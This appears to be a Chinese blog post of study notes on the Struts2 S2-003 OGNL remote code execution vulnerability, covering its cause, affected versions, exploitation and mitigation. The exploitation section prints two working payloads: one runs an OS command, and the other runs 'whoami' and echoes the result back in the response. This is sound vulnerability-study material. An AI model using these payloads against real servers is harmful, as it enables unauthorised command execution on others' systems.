(RCE)(Struts2)(笔记)s2-003漏洞学习笔记

最新推荐文章于 2024-08-19 11:19:25 发布
最新推荐文章于 2024-08-19 11:19:25 发布
阅读量301 收藏 8
点赞数 4
文章标签: struts 笔记 学习 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aaaadoga/article/details/140535484
版权

写在前面

这篇文章是关于作者学习s2-003漏洞的笔记
关于这篇文章,如果有建议或问题请留言或联系h3llow0rld@foxmail.com

正文

漏洞分析

漏洞详情页
这个漏洞环境vulhub没有准备
可以在该仓库获取演示demo:环境代码获取
如果不会启动项目的,看看这篇文章
如果想远程调试,参考这篇文章

影响版本

Struts 2.0.0 - Struts 2.1.8.1

漏洞原理

struts会将接收到的参数当作OGNL进行解析,并且对接收到的参数的过滤机制有缺陷:在com.opensymphony.xwork2.interceptor.ParameterFilterInterceptor中,匹配用户输入的正则表达式为:

this.acceptedParamNames = "[\\p{Graph}&&[^,#:=]]*";
利用条件/测试情景

1.利用条件
默认配置即可
2.测试情景
struts2应用的任何页面都可以测试

利用方法

验证PoC:(%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003dfalse%27)(bla)(bla)&(%27\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\%27calc\%27)%27)(bla)(bla)
如果是Linux,将calc替换为touch /tmp/success,然后检查tmp目录

有回显PoC:(%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003dfalse%27)(bla)(bla)&(%27\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\u0023mycmd\u003d\%27whoami\%27%27)(bla)(bla)&(%27\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)%27)(bla)(bla)&(A)((%27\u0023mydat\u003dnew\40java.io.DataInputStream(\u0023myret.getInputStream())%27)(bla))&(B)((%27\u0023myres\u003dnew\40byte[51020]%27)(bla))&(C)((%27\u0023mydat.readFully(\u0023myres)%27)(bla))&(D)((%27\u0023mystr\u003dnew\40java.lang.String(\u0023myres)%27)(bla))&(%27\u0023myout\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\u0023myout.getWriter().println(\u0023mystr)%27)(bla))

如何修复
紧急处理方法(仅供参考)

在struts.xml中配置ParameterInterceptor来过滤恶意字符

<interceptor-ref name="params">
    <param name="excludeParams">dojo\..*,^struts\..*,.*\\.*,.*\(.*,.*\).*,.*@.*</param>
</interceptor-ref>

观察恶意流量的特征,设置安全设备的防护规则

补丁修复方法

官方为 OgnlValueStack 添加了新的 allowStaticMethodAccess 属性,该属性默认为false,禁止静态方法的调用,但是没有从根本上进行修复漏洞

h4ckb0ss
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
struts2.3.32修补S2-045漏洞所有核心jar包及依赖的jar(含core包)
03-09
S2-045漏洞是一个严重的远程代码执行(RCE漏洞,存在于Apache Struts2的OGNL表达式语言中。这个漏洞允许攻击者通过精心构造的HTTP请求在服务器端执行任意代码,对系统安全构成极大威胁。Struts2.3.32的发布就是...
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
首先,s2-005漏洞(CVE-2012-0881)是2012年发现的一个严重问题,它涉及到Struts2的OGNL(Object-Graph Navigation Language)表达式在反序列化过程中的不当处理。OGNL是一种强大的表达式语言,允许动态访问和操作...
(RCE)(Struts2)s2-008漏洞学习笔记
aaaadoga的博客
07-19 206
这篇文章是关于作者学习s2-008漏洞笔记关于这篇文章,如果有建议或问题请留言或联系。
(注入)(RCE)(Struts2)s2-007漏洞学习笔记
aaaadoga的博客
07-19 278
这篇文章是关于作者学习s2-007漏洞笔记关于这篇文章,如果有建议或问题请留言或联系。
【无标题】(RCE)(Struts2)(笔记)s2-005漏洞学习笔记
aaaadoga的博客
07-18 158
这篇文章是关于作者学习s2-005漏洞笔记关于这篇文章,如果有建议或问题请留言或联系。
漏洞复现】vulhub struts2/s2-057
qq_46421742的博客
07-03 214
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
(Injection)(RCE)(Struts2)(笔记)s2-001漏洞学习笔记
aaaadoga的博客
07-17 977
这篇文章是关于作者学习s2-001漏洞笔记对于一个从事安全方向的人,漏洞复现和学习是非常有必要的,一方面是面试时可能会问到;另一方面是学习这些漏洞可以了解漏洞一般是怎么产生的,有助于你自个去发掘0day;还有就是对于安全工具开发者,研究漏洞有助于编写自动化工具实现漏洞的自动检测和利用在我学习一个漏洞的时候,我会以下几个方面入手这个漏洞的原理是什么这个漏洞影响哪些版本这个漏洞在什么环境下能触发这个漏洞怎么利用这个漏洞怎么修复的紧急响应的处理方法最终补丁使用的方法。
漏洞复现】vulhub struts2/s2-062
qq_46421742的博客
06-30 280
Struts 2 最初被称为 WebWork 2,它是一个简洁的、可扩展的框架,可用于创建企业级Java web应用框架。设计这个框架是为了从构建、部署、到应用程序维护方面来简化整个开发周期。Struts 2 是一个基于MVC设计模式MVC模型 --- 属于软件设计模式的底层基础,主要负责数据维护。视图 --- 这部分是负责向用户呈现全部或部分数据。控制器 --- 通过软件代码控制模型和视图之间的交互。
漏洞复现】Apache Struts CVE-2023-50164
zkaqlaoniao的博客
12-20 795
近日,Struts2 官方披露 CVE-2023-50164 Apache Struts 文件上传漏洞,攻击者可利用该漏洞污染相关上传参数导致目录遍历,在具体代码环境中可能导致上传 Webshell,执行任意代码。Struts2 官方披露 CVE-2023-50164 Apache Struts 文件上传漏洞,攻击者可利用该漏洞污染相关上传参数导致目录遍历,在具体代码环境中可能导致上传 Webshell,执行任意代码。
Codeql复现CVE-2018-11776学习笔记
向阳-Y.的博客
03-11 411
isAdditionalFlowStep用于衔接一些没匹配上的数据流,简单来说可能有如下情况,在调用bar()时没有提前调用foo(),导致数据流并不认为foo到bar是连通的所以默认DataFlow::Configuration是不包括这个流步骤的,因为也不能确定bar()中对this.field的访问总是被污染的,但是在漏洞挖掘中,包含这种形式的调用是非常有意义的。TaintTracking::localTaintStep(node1, node2) 测试node1到node2的连通性。
漏洞英文bug/Struts2漏洞的前因后果_小白渗透笔记
程序员三九的博客
08-07 377
有相当多企业的安全运维人员不知道自己是否用到了Struts,不知道在自家的网络中哪些设备或服务可能受到攻击,因此在此类漏洞爆发后不仅会面对巨大的压力
Apache Struts2S2-045)漏洞升级指南
03-07
### Apache Struts2 (S2-045) 漏洞升级指南 #### 一、漏洞概述 **Apache Struts2** 是一个基于MVC架构的开源Web应用程序框架,广泛应用于Java EE的企业级应用开发中。然而,在2017年3月,**Apache Struts2** 被...
Struts2-RCE:Burp Extender用于检查struts 2 RCE漏洞
04-15
此Burp扩展程序检测以下18个RCE,它们是S2-001 S2-007 S2-008 S2-012 S2-013 S2-014 S2-015 S2-016 S2-019 S2-029 S2-032 S2-033 S2-037 S2-045 S2-048 S2-053 S2-057 S2-DevMode加载扩展Burp Suite- > Extender- >...
Struts S2-045 漏洞调试及分析1
08-03
Struts S2-045漏洞是一个严重的远程代码执行(RCE漏洞,它发生在Apache Struts2框架中,特别是涉及到文件上传功能时使用Jakarta Multipart解析器的情况。这个漏洞发生在2016年,具体日期为3月9日。漏洞的根源在于...
哈希原理(笔记)
m0_62024160的博客
08-17 1017
尤其应该注意Hash function的设计,它是一个难点,Hash funtion设计好坏直接关乎哈希表查询速度的快慢。考虑到哈希碰撞(涉及到对链表的操作),所以最坏的时间复杂度都是O(n)。早期的md5被破解也是因为人们搞清楚了它的加密方法 f(1) )大多利用单向散列函数函数。(简称为f(2) )计算查询哈希碰撞确认某个哈希值的存在,但是无法通过 f(2)逆推出明文(因为 f(2)只是验证方法,而非解密方法)。(本图来源:wiki)这个签名是由文件的散列值通过发布者的私钥加密生成的。
树莓派开发笔记02-树莓派的GPIO口输出控制
wan1234512的博客
08-18 734
本文详细描述了树莓派GPIO编程的3种方式,wiringPi库、BCM2835库、Python库,以及分别使用这几种库进行GPIO的输出控制。
通信原理学习笔记
X131644的博客
08-18 256
一个手机通话需要经过下面三个网络 类别 接入网(Access Network) 承载网(Transport Network) 核心网(Core Network) 定义 连接终端用户与电信网络的部分。 在接入网和核心网之间传输数据的网络。 处理、交换和管理通过承载网传输的数据。 主要功能 - 用户接入- 信号传输- 覆盖局部区域 - 高效传输- 汇聚与分发- 资源管理 - 呼叫控制- 数据交换- 计费与用户管理- 服务提供 常见技术 - 有线接入(DSL, FTTH)- 无线接入(2G
树链剖分学习笔记
最新发布
mikeshizi1234的博客
08-19 350
首先,因为后面在讲解的时候会涉及到一些名词,我们来解释一下。重子:对于每一个非叶子节点,它的儿子中以那个儿子为根的子树节点数最大的儿子为该节点的重子。轻子:跟重子相反,一个点不是重子就是轻子(叶子节点除外),对于每一个非叶子节点,它的子中非重儿子的剩下所有儿子即为轻子。重边:一个父亲连接他的重子的边称为重边。轻边:跟重边相反,每一条边不是重边就是轻边。重链:重链的要求非常难,一点是相邻的重边连起来一个重子的链就是重链。如果有还不理解的同学,我们来画一张图来找一找这些东西在哪里。
Struts2 S2-020漏洞在Tomcat 8下的动态RCE攻击研究
总结来说,本文的核心知识点包括Struts2框架的S2-020漏洞原理、动态类加载特性对静态分析的影响、基于反射的属性枚举方法,以及如何利用Ognl表达式进行潜在的RCE攻击。通过这篇文章,读者可以学习到如何在实际的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值